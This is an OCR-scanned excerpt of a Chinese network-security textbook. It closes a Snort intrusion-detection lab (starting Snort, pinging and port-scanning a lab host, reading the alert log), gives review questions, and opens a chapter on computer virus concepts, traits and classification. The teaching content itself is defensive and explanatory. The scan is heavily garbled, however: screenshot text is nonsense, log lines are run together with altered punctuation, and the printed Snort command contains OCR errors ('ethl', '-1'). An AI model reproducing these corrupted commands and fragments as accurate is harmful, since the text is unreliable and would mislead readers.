图 7.9 编辑 /etc/snort/rules/icmp.rules 文 件 


(2) 在 192.168.10.5 上 启动 Snort 进行 入 侵 检 测 ， 执 行 的 命令 如 下 : 


[root@localhost ~]# snort -i ethl -c /etc/snort/snort.conf -A fast -1 
/var/log/snort/ 


(3) 在 192.168.10.1 上 的 终端 窗口 中 执行 ping 192.168.10.5 命令 ， 如 图 7.10 所 示 ， 然 
后 再 使 用 端口 扫描 工具 对 192.168.10.5 进行 端口 扫描 ， 如 图 7.11 所 示 。 
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IE -io 


Ele Dtims Help 


Sm ie ii 5 FUssiange [115 10 ，5 [要 到 出 
厂 Use gow ofranges 


Selectpats ange. [3H -BEE FF Use delad pots fat 
Use ports rarges ist 
| 日 国 192.168.105 Ports (scamed 67 of 61, pened. 1 closel: 66) 


后 
图 7.10 执行 ping 192.168.10.5 命令 7.11 对 192.168.10.5 进行 端口 扫描 


(4) 在 192.168.10.5 et 


如 图 7.12 所 示 ， 前 4 行 对 应 于 第 (3) 步 的 ping 命令 ,第 6 行 表明 192.168.10.1 对 


192.168.10.5 A 


若 alert (/ 
文件 人 纺 缉 人 下 看 WO) 搜索 G) 工具 CD 文档 名) 帮助 名 
[Dsnortconr x|Dscannes x| 吕 snmprues x|Daer x 


og norn) "gedit cl 


| 103/22-15:49:29,549525 [+**] (1: [Priority: 0] {ICMP} 192,168.10,1 -> 192,168.10,5 
203/22-15:49:30,551404 [+*] [1 [Priority: 0] {ICMP} 192.168.19.1 -> 192.168.10.5 
303/22-15:49;31.552594 【yy] [1 [Priority: 0] {ICMP} 192.168,10.1 .> 192.168.10.5 
4 03/22- 15;49:32.553773 [ye] 【1; 了 [Priority: 9] {ICMP} 192,168.10.1 -> 192.168.10.5 
503/22-15:50; 11.955264 {++] [1; 20000:3] TESTICKP 了 7 人 [+**] [Priority: 0] {ICMP) 192.,168,10.1 .> 192,168.10,5 


603/22-15:50:28.482319 [+**] [122:1:0] (Rortscan) cp Portscan [**] [Priority: 3] {PROTO:255} 192.168,10.1 -> 192.168,10,5 

703/22-15:50:28.510107 [+**] (1:1418:11] SNMP request tcp [**] [Classification: Attempted Information Leak] [Priority; 2] 
{TCP} 192,168.10,1:1074 -> 192.168.10.5: 161 

8.03/22-15:50:28.510129 [**] [1:1420:11] SNMP trap tcp [**] [Classification: Attempted Information Leak] [Priority: 2] 
{TCP} 192.168.10.1:1075 .> 192.168.10.5;162 

903/22-15:50:28,971766 [+**] [1:1420:11] SNMP trap tcp [*y] [Classification: Attempted Information Leak] [Priority: 2] 
{TCP} 192.168.10.1:1075 -> 192,168.10.5:162 

03/22-15:50;28,972564 [+**] [1:1418:11] SNMP request tcp [**] [Classification: Attempted Information Leak] [Priority; 2] 


行 11, 列 1 扳 入 


图 7.12 分析 检 测 数据 


复习 思考 题 七 


选择 题 
入 侵 防护 系统 的 缩写 是 @@ ，_@ 是 指 计 算 机 紧急 响应 小 组 ，_@ 是 认证 中 心 ， 


图 是 入 侵 检 测 系统 的 缩写 
( ) © A. IDS B. IPS CG CERT DD. CA 
K ) Q@ A. IDS B. IPS C. CERT DD. CA 
( ) ©® A. IDS B. IPS C. CERT DD. CA 
人 ) ®@ A. Ds B. IPS C. CERT DD, CA 
二 、 问 答题 


什么 是 入 侵 检 测 系统 ? 它 由 哪些 基本 组 件 构 成 ? 
2. 简 述 入 侵 检测 的 功能 和 分 类 。 
3. 简 述 常用 的 误 用 检测 技术 和 异常 检测 技术 的 原理 。 


{TCP} 192.168.10.1:1074 -> 192.168,10.5:161 S| 
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. 比较 异常 检测 和 误 用 检测 技术 的 优 、 缺 点 。 

. 简 述 Honeypot 和 Honeynet 之 间 的 关系 。 

. 简 述 入 侵 响 应 技术 的 基本 手段 。 

. 比较 基于 网 络 和 基于 主机 的 入 侵 检 测 系统 的 优 、 缺 点 。 

. 入 侵 检 测 系统 与 协同 的 含义 是 什么 ? 主要 协同 类 型 有 哪些 ? 

. 结合 实际 谈 一 谈 当 前 入 侵 检测 的 现状 与 不 足 ， 以 及 下 一 代入 侵 检测 应 具有 的 良好 


Co om 


特性 。 


(19. 


10. 为 什么 说 入 侵 检 测 是 防火 墙 的 合理 补充 ? 
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学 习 目 标 

系统 学 习 计 算 机 病毒 的 概念 、 特 点 及 分 类 ， 计 算 机 网 络 病毒 的 概念 、 特 点 和 分 类 以 及 
计算 机 网 络 病毒 的 危害 ; 学 习 几 种 典型 病毒 的 原理 及 清除 方法 ; 了 解 计 算 机 病毒 发 作 前 、 
发 作 时 和 发 作 后 的 症状 ; 同时 了 解 反 病 毒 技 术 、 计 算 机 病毒 发 展 的 新 技术 和 防 杀 网 络 病毒 
的 软件 。 通 过 对 本 章 内 容 的 学 习 ， 读 者 应 掌握 及 了 解 以 下 内 容 。 

@ 掌握 计算 机 病毒 的 概念 、 特 点 和 分 类 ， 几 种 典型 病毒 的 原理 、 特 征 及 预防 措施 ， 

计算 机 病毒 的 症状 ， 反 病毒 技术 。 
@ 了 解 计算 机 病毒 发 展 的 新 技术 ， 防 杀 网 络 病毒 的 软件 。 


8.1 计算 机 网 络 病毒 的 特点 及 危害 


计算 机 病毒 对 系统 的 危害 是 众所周知 的 。 起 初 的 计算 机 病毒 只 是 在 单机 中 传播 ， 而 如 
今 随 着 计算 机 网 络 应 用 的 日 益 普及 ， 计 算 机 病毒 凭借 互联 网 迅速 地 传播 、 繁 殖 ， 其 速度 和 
危害 性 已 引起 越 来 越 多 人 的 重视 。 目 前 ， 在 网 络 信息 安全 领域 ,计算 机 病毒 特别 是 网 络 病 
毒 已 经 成 为 一 种 有 效 的 攻击 手段 。 


8.1.1 计算 机 病毒 的 概念 


“计算 机 病毒 ”与 医学 上 的 “病毒 ”不 同 ， 它 是 根据 计算 机 软 、 硬 件 所 固有 的 弱点 ， 
编制 出 的 具有 特殊 功能 的 程序 。 由 于 这 种 程序 具有 传染 性 和 破坏 性 ， 与 医学 上 的 “病毒 ” 
有 相似 之 处 ， 因 此 习惯 上 将 这 些 “具有 特殊 功能 的 程序 ” 称 为 “计算 机 病毒 ”。 

1983 年 11 月 10 日 ,美国 人 Fred Cohen 以 测试 计算 机 安全 为 目的 ， 编 写 并 发 布 了 首 
个 计算 机 病毒 。30 多 年 后 的 今天 ， 全 世界 已 有 约 6 万 种 计算 机 病毒 ， 极 大 地 威胁 着 计算 机 
信息 安全 。 如 2004 年 上 半年 ，“ 震 荡 波 ”病毒 横扫 全 世界 。“ 震 荡 波 ”病毒 会 在 网 络 中 
自动 搜索 系统 有 漏洞 的 计算 机 ， 并 引导 其 下 载 病毒 文件 并 执行 。 整 个 传播 和 发 作 过 程 不 需 
要 人 为 干预 ， 只 要 这 些 计算 机 接 入 Interet 且 没 有 安装 相应 的 系统 补丁 程序 ， 就 有 可 能 被 
感染 。 病 毒 会 使 “安全 认证 子 系统 ”进程 (1sass.exe) 崩 溃 ， 致 使 系统 反复 重启 ， 并 且 使 与 安 
全 认证 有 关 的 程序 出 现 严 重 运行 错误 。 

从 广义 上 讲 ， 凡 能 够 引起 计算 机 故障 ， 破 坏 计 算 机 数据 的 程序 统称 为 计算 机 病毒 。 依 
据 此 定义 ， 如 逻辑 炸弹 、 蠕 虫 等 均 可 称 为 计算 机 病毒 。 

1994 年 2 月 18 日 ， 我 国正 式 颁 布 实施 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 
例 》， 在 该 条 例 第 二 十 八条 中 明确 指出 ， 计 算 机 病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 
破坏 计算 机 功能 ， 或 者 毁坏 数据 、 影 响 计 算 机 使 用 ， 并 能 自我 复制 的 一 组 计算 机 指令 或 者 
程序 代码 。 此 定义 具有 法 律 性 、 权 威 性 。 


8.1.2 计算 机 病毒 的 特点 


1. 传染 性 
计算 机 病毒 会 通过 各 种 渠道 从 已 被 感染 的 计算 机 扩散 到 未 被 感染 的 计算 机 ， 造 成 被 感 
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染 的 计算 机 工作 失常 甚至 瘫痪 。 与 生物 病毒 不 同 的 是 ， 计 算 机 病毒 代码 一 旦 进入 计算 机 并 
得 以 执行 ， 它 会 搜寻 其 他 符合 传染 条 件 的 程序 或 存储 介质 ， 确 定 目标 后 再 将 自身 代码 插入 
其 中 ， 达 到 自我 繁殖 的 目的 。 

2. 隐蔽 性 

计算 机 病毒 的 源 程序 可 以 是 一 个 独立 的 程序 体 ， 源 病毒 经 过 扩散 生成 的 再 生病 毒 往往 
采用 附加 和 插入 的 方式 隐藏 在 可 执行 程序 和 数据 文件 中 ， 采 取 分 散 和 多 处 隐藏 的 方式 ， 而 
当 有 病毒 程序 潜伏 的 程序 体 被 合法 调用 时 ， 病 毒 程序 也 合法 进入 ， 并 可 将 分 散 的 程序 部 分 
在 非法 占用 的 存储 空间 进行 重新 装配 ， 构 成 一 个 完整 的 病毒 体 投入 运行 。 

3. 潜伏 性 

大 部 分 的 病毒 感染 系统 之 后 长 期 隐藏 在 系统 中 ， 悄 悄 地 繁殖 和 扩散 而 不 被 发 觉 ， 只 有 
在 满足 其 特定 条 件 时 才 启动 其 表现 (破坏 ) 模 块 。 只 有 这 样 它 才 可 达到 长 期 隐藏 ， 偷 偷 扩散 
的 目的 。 

4. 破坏 性 (表现 性 ) 
任何 病毒 只 要 侵入 系统 ， 就 会 对 系统 及 应 用 程序 产生 程度 不 同 的 影响 。 轻 则 会 降低 计 
算 机 工作 效率 ， 占 用 系统 资源 ， 重 则 可 导致 系统 崩溃 ， 根 据 病毒 的 这 一 特性 可 将 病毒 分 为 
良性 病毒 与 恶性 病毒 。 良 性 病毒 可 能 只 显示 些 画面 或 无 聊 的 语句 ， 或 者 根本 没有 任何 破坏 
动作 ， 但 会 占用 系统 资源 ， 这 类 病毒 表现 较为 温和 。 亚 性 病毒 则 有 明确 的 目的 ， 或 破坏 数 
据 、 删 除 文件 ， 或 加 密 磁盘 、 格 式 化 磁盘 ， 甚 至 造成 不 可 挽回 的 损失 。 表 现 和 破坏 是 病毒 
的 最 终 目的 。 

5. 不 可 预见 性 

从 对 病毒 的 检测 方面 来 看 ， 病 毒 还 有 不 可 预见 性 。 不 同 种 类 的 病毒 ， 其 代码 千 差 万 
别 ， 但 有 些 操作 是 共有 的 (如 驻 留 内 存 、 更 改 中 断 等 )。 有 些 人 利用 病毒 的 这 种 共性 ， 制 作 
了 声称 可 查 所 有 病毒 的 程序 。 这 种 程序 的 确 可 查 出 一 些 新 病毒 ， 但 由 于 目前 的 软件 种 类 极 
多 ， 且 某 些 正常 程序 也 使 用 了 类 似 病毒 的 操作 ， 甚 至 借鉴 了 某 些 病毒 技术 ， 因 此 使 用 这 种 
方法 对 病毒 进行 检测 势必 会 造成 较 多 的 误 报 情况 ， 而 且 病 毒 的 制作 技术 也 在 不 断 提高 ， 病 
毒 对 反 病毒 软件 永远 是 超前 的 。 

6. 触发 性 

病毒 因 某 个 事件 或 数值 的 出 现 ， 诱 使 病毒 实施 感染 或 进行 攻击 的 特性 称 为 可 触发 性 。 
病毒 既 要 隐蔽 又 要 维持 攻击 力 ， 必 须 具 有 可 触发 性 。 

病毒 的 触发 机 制 用 于 控制 感染 和 破坏 动作 的 频率 。 计 算 机 病毒 一 般 都 有 一 个 触发 条 
件 ， 它 可 以 按照 设计 者 的 要 求 在 某 个 点 上 激活 并 对 系统 发 起 攻击 。 

7. 针对 性 

病毒 的 感染 及 发 作 有 一 定 的 环境 要 求 ， 并 不 一 定 对 任何 系统 都 能 感染 。 
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8. 寄生 性 (依附 性 ) 


计算 机 病毒 程序 嵌入 到 宿主 程序 中 ， 依 赖 于 宿主 程序 的 执行 而 生存 ， 这 就 是 计算 机 病 
毒 的 寄生 性 。 病 毒 程序 在 侵入 到 宿主 程序 中 后 ， 一 般 会 对 宿主 程序 进行 一 定 的 修改 ， 宿 主 
程序 一 旦 执行 ， 病 毒 程序 就 被 激活 ， 从 而 可 以 进行 自我 复制 。 

通常 认为 ， 计 算 机 病毒 的 主要 特点 是 传染 性 、 隐 项 性 、 潜 伏 性 、 寄 生性 和 破坏 性 。 


8.1.3 计算 机 病毒 的 分 类 


按照 计算 机 病毒 的 特点 ， 对 计算 机 病毒 可 从 不 同 角度 进行 分 类 。 计 算 机 病毒 的 分 类 广 
法 有 许多 种 ， 因 此 ， 同 一 种 病毒 可 能 有 多 种 不 同 的 分 类 方法 。 

1. 基于 破坏 程度 分 类 

基于 破坏 程度 分 类 是 最 流行 、 最 科学 的 分 类 方法 之 一 ， 按 照 此 种 分 类 方法 ， 病 毒 可 以 
分 为 良性 病毒 和 恶性 病毒。 

(1) 良性 病毒 是 指 其 中 不 含有 立即 对 计算 机 系统 产生 直接 破坏 作用 的 代码 。 这 类 病毒 
为 了 表现 其 存在 ， 只 是 不 停 地 进行 扩散 ， 从 一 台 计算 机 传染 到 另 一 台 ， 虽 然 不 破坏 计算 机 
内 的 数据 ， 却 会 造成 计算 机 程序 的 工作 异常 。 常 见 的 良性 病毒 有 “小 球 ”病毒 “台湾 一 
号 ”“ 维 也 纳 ”和 “巴基斯坦 ”病毒 等 。 

(2) 恶性 病毒 在 其 代码 中 包含 有 破坏 计算 机 系统 的 操作 ， 在 其 传染 或 改作 时 会 对 系统 
产生 直接 的 破坏 作用 。 恶 性 病毒 感染 后 一 般 没有 异常 表现 ， 会 将 自己 隐藏 得 更 深 ， 但 是 一 
且 发 作 ， 就 会 破坏 计算 机 数据 、 删 除 文件 ， 有 的 甚至 会 对 硬盘 进行 格式 化 ， 造 成 整个 计算 
机 瘫痪 ， 等 人 们 察觉 时 ， 己 经 对 计算 机 数据 或 硬件 造成 了 破坏 ， 损 失 将 难以 挽回 。 这 种 病 
毒 有 很 多 ， 如 “黑色 星期 五 ”病毒 、“CIH 系统 毁灭 者 ”等 。 恶 性 病毒 是 很 危险 的 ， 应 当 
注意 防范 。 

2. 基于 传染 方式 分 类 


按照 传染 方式 的 不 同 ， 病 毒 可 分 为 引导 型 病毒 、 文 件 型 病毒 和 混合 型 病毒 3 种 。 

(1) 引导 型 病毒 是 指 开机 启动 时 ， 病 毒 在 DOS 的 引导 过 程 中 被 载 入 内 存 ， 它 先 于 操作 
系统 运行 ， 所 依靠 的 环境 是 BIOS 中 断 服务 程序 。 引 导 区 是 磁盘 的 一 部 分 ， 它 在 开机 启动 
时 控制 计算 机 系统 。 引 导 型 病毒 正 是 利用 了 操作 系统 的 引导 区 位 置 固定 ， 且 控制 权 的 转交 
方式 以 物理 地 址 为 依据 ， 而 不 是 以 引导 区 的 内 容 为 依据 这 一 特点 ， 将 真正 的 引导 区 内 容 进 
行 转移 或 替换 ， 待 病毒 程序 被 执行 后 ， 再 将 控制 权 交 给 真正 的 引导 区 内 容 ， 使 得 这 个 带 病 
毒 的 系统 看 似 正常 运转 ， 而 病毒 已 隐藏 在 系统 中 等 待 传染 和 发 作 。 

(2) 文件 型 病毒 依靠 可 执行 文件 ， 即 文件 扩展 名 为 . COM 和 . EXE 等 程序 ， 它 们 存放 在 
可 执行 文件 的 头 部 或 尾部 。 目 前 绝 大 多 数 的 病毒 都 属于 文件 型 病毒 。 文 件 型 病毒 将 病毒 的 
代码 加 载 到 运行 程序 的 文件 中 ， 只 要 运行 该 程序 ， 病 毒 就 会 被 激活 ， 引 入 内 存 ， 并 占领 
CPU 得 到 控制 权 。 病 毒 会 在 磁盘 中 寻找 未 被 感染 的 可 执行 文件 ， 将 自身 放 入 其 首部 或 尾 
部 ， 并 修改 文件 的 长 度 使 病毒 程序 合法 化 ， 它 还 能 修改 该 程序 ， 使 该 文件 执行 前 首先 挂靠 
病毒 程序 ， 在 病毒 程序 的 出 口 处 再 跳 向 原 程序 开始 处 ， 这 样 就 使 该 执行 文件 成 为 新 的 病毒 
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源 。 已 感染 病毒 的 文件 执行 速度 会 减缓 ， 甚 至 完全 无 法 执行 ， 甚 至 有 些 文件 遭 感染 后 ， 一 
执行 就 会 被 删除 。 

(3) 混合 型 病毒 通过 技术 手段 把 引导 型 病毒 和 文件 型 病毒 组 合成 为 一 体 ， 使 之 具有 引 
导 型 病毒 和 文件 型 病毒 丙种 特征 ， 以 两 者 相互 促进 的 方式 进行 传染 。 这 种 病毒 既 可 以 传染 
引导 区 又 可 以 传染 可 执行 文件 ， 增 加 了 病毒 的 传染 性 及 存活 率 。 不 管 以 哪 种 方式 传染 ， 只 
要 进入 计算 机 就 会 经 开机 或 执行 程序 而 感染 其 他 的 磁盘 或 文件 ， 从 而 使 其 传播 范围 更 广 ， 
更 难以 被 清除 干净 。 如 果 只 将 病毒 从 被 感染 的 文件 中 清除 控 ， 当 系统 重新 启动 时 ， 病 毒 又 
将 从 硬盘 引导 记录 进入 内 存 ， 文 件 被 重新 感染 ， 如 果 只 将 隐藏 在 引导 记录 里 的 病毒 消除 
挤 ， 当 运行 文件 时 引导 记录 又 会 被 重新 感染 。 

3. 基于 算法 分 类 


按照 病毒 特有 的 算法 ， 可 以 划分 为 伴随 型 病毒 、 里 虫 型 病毒 和 寄生 型 病毒 。 

(1) 伴随 型 病毒 并 不 改变 文件 本 身 ， 而 是 根据 算法 产生 . EXE 文件 的 伴随 体 ， 与 文件 具 
有 同样 的 名 字 和 不 同 的 扩展 名 ， 如 CCR.EXE 的 伴随 体 是 CCR.COM。 当 DOS 加 载 文件 
时 ， 伴 随 体 优先 被 执行 ， 再 由 伴随 体 加 载 执 行 原来 的 . EXE 文件 。 

(2) 蠕虫 型 病毒 通过 计算 机 网 络 进行 传播 ， 它 不 改变 文件 和 资料 信息 ， 而 是 根据 计算 
机 的 网 络 地 址 ， 将 病毒 通过 网 络 发 送 ， 蠕 虫 病毒 除了 占用 内 存 外 一 般 不 占用 其 他 资源 。 

(3) 寄生 型 病毒 。 除 伴随 型 病毒 和 蠕虫 型 病毒 之 外 的 其 他 病毒 均 可 称 为 寄生 型 病毒 。 
它们 依附 在 系统 的 引导 区 或 文件 中 ， 通 过 系统 的 功能 进行 传播 ， 按 算法 又 可 分 为 练习 型 病 
毒 、 诡 秘 型 病毒 和 变型 病毒 。 


4. 基于 链接 方式 分 类 


按照 病毒 的 链接 方式 ， 可 以 分 为 源码 型 病毒 、 入 侵 型 病毒 、 外 壳 型 病毒 和 操作 系统 型 
病毒 。 

(1) 源码 型 病毒 攻击 的 目标 是 源 程序 。 在 源 程 序 编译 之 前 ， 将 病毒 代码 插入 源 程序 ， 
编译 后 病毒 变 成 合法 程序 的 一 部 分 ， 成 为 以 合法 身份 存在 的 非法 程序 。 

源码 型 病毒 比较 少见 ， 在 编写 时 要 求 源码 病毒 所 用 语言 必须 与 被 攻击 源码 程序 的 语言 
相同 。 

(2) 入 侵 型 病毒 可 用 自身 代替 宿主 程序 中 的 部 分 模块 或 堆栈 区 ， 因 此 这 类 病毒 只 攻击 
某 些 特定 程序 ， 针 对 性 强 。 这 种 病毒 的 编写 也 很 困难 ， 因 为 病毒 遇见 的 宿主 程序 千 变 万 
化 ， 病 毒 在 不 了 解 其 内 部 逻辑 的 情况 下 ， 要 将 宿主 程序 拦腰 截断 ， 插 入 病毒 代码 ， 而 且 还 
要 保证 病毒 程序 能 正常 运行 。 该 病毒 一 旦 侵入 程序 体 后 也 较 难 消除 。 如 果 同 时 采用 多 态 性 
病毒 技术 、 超 级 病毒 技术 和 隐蔽 性 病毒 技术 ， 将 给 当前 的 反 病毒 技术 带 来 严峻 的 挑战 。 

(3) 外 壳 型 病毒 将 其 自身 附 在 宿主 程序 的 头 部 或 尾部 ， 相 当 于 给 宿主 程序 增加 了 一 个 
外 壳 ， 但 对 宿主 程序 不 作 修改 。 这 种 病毒 最 为 常见 ， 易 于 编写 ， 也 易于 被 发 现 ， 通 过 测试 
文件 的 大 小 即 可 发 现 。 大 部 分 的 文件 型 病毒 都 属于 这 一 类 。 

(4) 操作 系统 型 病毒 用 它 自己 的 程序 加 入 或 取代 部 分 操作 系统 进行 工作 ， 具 有 很 强 的 
破坏 力 ， 可 以 导致 整个 系统 瘫痪 。 圆 点 病毒 和 大 麻 病 毒 就 是 典型 的 操作 系统 型 病毒 。 这 种 
病毒 在 运行 时 ， 用 自己 的 逻辑 部 分 取代 操作 系统 的 合法 程序 模块 ， 对 操作 系统 进行 破坏 。 
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5. 基于 传播 的 介质 分 类 


按照 病毒 传播 的 介质 ， 可 以 分 为 网 络 病毒 和 单机 型 病毒 。 

(1) 网 络 病毒 通过 计算 机 网 络 传播 感染 网 络 中 的 可 执行 文件 。 这 种 病毒 的 传染 能 力 
强 ， 破 坏 力 大 。 

(2) 单机 型 病毒 的 载体 是 磁盘 ， 常 见 的 是 病毒 从 软盘 传 入 硬盘 ， 感 染 系 统 ， 然 后 再 传 
染 其 他 软盘 ， 再 由 软盘 传染 其 他 系统 。 


6. 基于 攻击 的 系统 分 类 


按照 计算 机 病毒 攻击 的 系统 ， 可 以 分 为 攻击 DOS 系统 的 病毒 、 攻 击 Windows 系统 的 
病毒 、 攻 击 UNIX 系统 的 病毒 和 攻击 OS/2 系统 的 病毒 。 

(1) 攻击 DOS 系统 的 病毒 ， 这 类 病毒 出 现 最 早 、 数 量 最 大 ， 变 种 也 最 多 ， 以 前 计算 机 
病毒 基本 上 都 是 这 类 病毒 。 

(2) 攻击 Windows 系统 的 病毒 ，Windows 因 其 图 形 用 户 界面 和 多 任务 操作 系统 而 深 受 
户 的 欢迎 ，Windows 逐渐 取代 DOS， 从 而 成 为 病毒 攻击 的 主要 对 象 。 我 国 发 现 的 首 例 破 
坏 计 算 机 硬件 的 CIH 病毒 就 是 一 个 攻击 Windows 95/98 的 病毒 。 

(3) 攻击 UNIX 系统 的 病毒 ，UNIX 系统 应 用 非常 广泛 ， 并 且 许 多 大 型 的 操作 系统 均 采 
用 UNIX 作为 其 主要 的 操作 系统 ， 所 以 针对 UNIX 系统 的 病毒 的 出 现 ， 对 信息 处 理 也 是 一 个 
严重 的 威胁 。 

(4) 攻击 OS/2 系统 的 病毒 ， 世 界 上 已 经 发 现 第 一 个 攻击 OS/2 系统 的 病毒 。 

7. 基于 激活 的 时 间 分 类 

按照 病毒 激活 的 时 间 ， 可 分 为 定时 病毒 和 随机 病毒 。 定 时 病毒 仅 在 某 一 特定 时 间 才 发 
作 ; 而 随机 病毒 一 般 不 是 由 时 钟 来 激活 的 。 

上 述 分 类 是 相对 的 ， 同 一 种 病毒 按 不 同 的 分 类 方法 可 属于 不 同类 型 。 


8.1.4 计算 机 网 络 病毒 的 概念 


1. 计算 机 网 络 病毒 的 定义 


传统 的 网 络 病毒 是 指 利用 网 络 进行 传播 的 一 类 病毒 的 总 称 。 网 络 成 了 传播 病毒 的 通 
道 ， 使 病毒 从 一 台 计 算 机 传染 到 另 一 台 计 算 机 ， 然 后 传 遍 网 络 中 的 全 部 计算 机 ， 一 般 如 果 
发 现 网 络 中 有 一 个 站 点 感染 病毒 ， 那 么 其 他 站 点 也 会 有 类 似 病 毒 。 一 个 网 络 系统 只 要 有 入 
点 ， 那 么 就 很 有 可 能 感染 上 网 络 病毒 ， 使 病毒 在 网 络 中 传播 扩散 ， 甚 至 会 破坏 系统 。 

严格 地 说 ， 网 络 病毒 是 以 网 络 为 平台 ， 能 在 网 络 中 传播 、 复 制 及 破坏 的 计算 机 病毒 ， 

像 网 络 蠕虫 病毒 等 一 些 威胁 到 计算 机 ， 以 及 计算 机 网 络 正常 运行 和 安全 的 病毒 才 可 以 算 作 
计算 机 网 络 病毒 。“ 网 络 病毒 ”与 单机 病毒 有 较 大 区 别 。 计 算 机 网 络 病毒 专门 使 用 网 络 协 
议 (如 TCP/IP、FIP、UDP、HTTP、SMTP 和 POP3 等 ) 来 进行 传播 ， 它 们 通常 不 修改 系统 
文件 或 硬盘 的 引导 区 ， 而 是 感染 客户 计算 机 的 内 存 ， 强 制 这 些 计算 机 向 网 络 发 送 大 量 信 
息 ， 因 而 导致 网 络 速度 下 降 甚 至 完全 瘫痪 。 由 于 网 络 病毒 保留 在 内 存 中 ， 因 此 传统 的 基于 
磁盘 的 文件 IO 扫描 方法 通常 无 法 检测 到 它们 。 


.5202\. 


~ 


ZI 


nl 


第 8 章 计算 机 病毒 防治 技术 倒 天 


2. 计算 机 网 络 病毒 的 传播 方式 


Intemet 技术 的 进步 同样 给 许多 恶毒 的 网 络 攻击 者 提供 了 一 条 便捷 的 攻击 路 径 ， 他 们 利 
用 网 络 来 传播 病毒 ， 其 破坏 性 和 隐蔽 性 更 强 。 
一 般 来 说 ， 计 算 机 网 络 的 基本 构成 包括 网 络 服务 器 和 网 络 节点 (包括 有 盘 工 作 站 、 无 盘 
工作 站 和 远程 工作 站 )。 病 毒 在 网 络 环境 下 的 传播 ， 实 际 上 是 按 “ 工 作 站 一 服务 器 一 工作 
站 ”的 方式 进行 循环 传播 。 计 算 机 病毒 一 般 先 通过 有 盘 工 作 站 的 软盘 或 硬盘 进入 网 络 ， 然 
后 开始 在 网 络 中 传播 。 

有 具体 地 说 ， 其 传播 方式 有 以 下 几 种 。 

(1) 病毒 直接 从 有 盘 工 作 站 复制 到 服务 器 中 。 

(2) 病毒 先 感染 工作 站 ， 在 工作 站 内 存 驻 留 ， 等 运行 网 络 盘 内 程序 时 再 感染 服务 器 。 

(3) 病毒 先 感染 工作 站 ， 在 工作 站 内 存 驻 留 ， 当 病毒 运行 时 通过 映像 路 径 感染 到 服务 
器 中 。 

(4) 如 果 远 程 工作 站 被 病毒 侵入 ， 病 毒 也 可 通过 通信 中 数据 的 交换 进入 网 络 服务 器 中 。 

计算 机 网 络 病毒 的 传播 和 攻击 主要 通过 两 个 途径 ， 即 用 户 邮 件 和 系统 漏洞 。 所 以 ， 一 
方面 网 络 用 户 要 加 强 自身 的 网 络 意识 ， 对 陌生 的 电子 邮件 和 网 站 提高 警惕 ， 另 一 方面 操作 
系统 要 及 时 地 进行 系统 升级 ， 以 加 强 对 病毒 的 防范 能 力 。 

随 着 Intemet 的 发 展 ， 病 毒 的 传播 速度 明显 加 快 ， 传 播 范围 也 开始 从 区 域 化 走向 全 球 
化 。 新 一 代 病 毒 主要 通过 电子 邮件 、 网 页 浏览 、 网 络 服 务 等 网 络 途径 传播 ， 传 播 速度 极 
快 、 发 生 频率 更 高 ， 防 御 更 难 ， 往 往 在 找到 解决 办 法 前 病毒 已 经 造成 严重 危害 。 


3. 计算 机 网 络 病毒 的 特点 


从 计算 机 网 络 病 毒 的 传播 方式 可 以 看 出 ， 计 算 机 网 络 病毒 除 具 有 一 般 病毒 的 特点 外 ， 
还 有 以 下 新 的 特点 。 

(1) 传染 方式 多 。 病 毒 入 侵 网 络 系统 的 主要 途径 是 通过 工作 站 传播 到 服务 器 硬盘 ， 再 
由 服务 器 的 共享 目录 传播 到 其 他 工作 站 。 

(2) 传播 速度 快 。 单 机 病毒 只 能 通过 磁盘 从 一 台 计 算 机 传染 到 另 一 台 计 算 机 ， 而 网 络 
病毒 则 可 以 通过 网 络 通信 机 制 ， 借 助 高 速 电缆 迅速 扩散 。 

(3) 清除 难度 大 。 再 顽固 的 单机 病毒 也 可 通过 删除 带 毒 文件 、 格 式 化 硬盘 等 措施 将 病 
毒 清除 ， 而 网 络 中 只 要 有 一 台 工 作 站 未 消毒 干净 ， 就 可 使 整个 网 络 全 部 重新 被 病毒 感染 ， 
甚至 刚刚 完成 杀毒 工作 的 一 台 工 作 站 也 有 可 能 被 网 上 另 一 台 工作 站 的 带 毒 程序 所 传染 。 

(4) 扩散 面 广 。 不 但 能 迅速 传染 局 域 网 内 所 有 计算 机 ， 还 能 通过 远程 工作 站 将 病毒 在 
一 瞬间 传播 到 千里 之 外 。 

(5) 破坏 性 大 。 网 络 上 的 病毒 将 直接 影响 网 络 的 工作 ， 轻 则 降低 速度 ， 影 响 工作 效 
率 ， 重 则 造成 网 络 系 统 瘫痪 ， 破 坏 服 务 器 系统 资源 ， 使 众多 工作 毁 于 一 旦 。 


8.1.5 计算 机 网 络 病毒 的 分 类 


计算 机 网 络 病毒 的 发 展 是 相当 迅速 的 ， 目 前 主要 的 网 络 病毒 有 以 下 几 种 。 
(1) 网 络 木 马 病毒 (Trojan)。 传 统 的 木马 病毒 是 指 一 些 有 正常 程序 外 表 的 病毒 程序 ， 如 
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一 些 密码 窃取 病毒 ， 它 会 伪装 成 系统 登录 框 ， 当 在 登录 框 中 输入 用 户 名 与 密码 时 ， 这 个 伪 
装 登录 框 的 木马 便 会 将 用 户口 令 通过 网 络 泄露 出 去 。 

(2) 蠕虫 病毒 (Worm)。 蠕 虫 病毒 是 指 利用 网 络 缺 陷 进行 繁殖 的 病毒 程序 ， 如 “英里 
斯 ”病毒 就 是 典型 的 蠕虫 病毒 。 它 利用 网 络 的 缺陷 在 网 络 中 大 量 繁殖 ， 导 致 几 千 台 服务 器 
无 法 正常 提供 服务 。 如 今 的 蠕虫 病毒 除了 利用 网 络 缺陷 外 ， 更 多 地 利用 了 一 些 新 的 技术 。 
例如 ，“ 求 职 信 ” 病 毒 是 利用 邮件 系统 这 一 大 众 化 的 平台 将 自己 传 遍 千 家 万 户 ;， “密码 ” 
病毒 是 利用 人 们 的 好 奇 心理 ， 诱 使 用 户主 动 运 行 病 毒 ，“ 尼 姆 达 ” 病 毒 则 是 综合 了 系统 病 
毒 的 方法 ， 利 用 感染 文件 来 加 速 自己 的 传播 。 目 前 常 说 的 网 络 病毒 就 是 指 蠕虫 病毒 。 

(3) 捆绑 器 病毒 (BindeD 。 捆 绑 器 病毒 是 一 个 很 新 的 概念 ， 人 们 编写 这 种 程序 的 最 初 目 
的 是 希望 通过 一 次 单 击 可 以 同时 运行 多 个 程序 ， 然 而 这 一 工具 却 成 了 病毒 传播 的 新 帮 凡 |。 
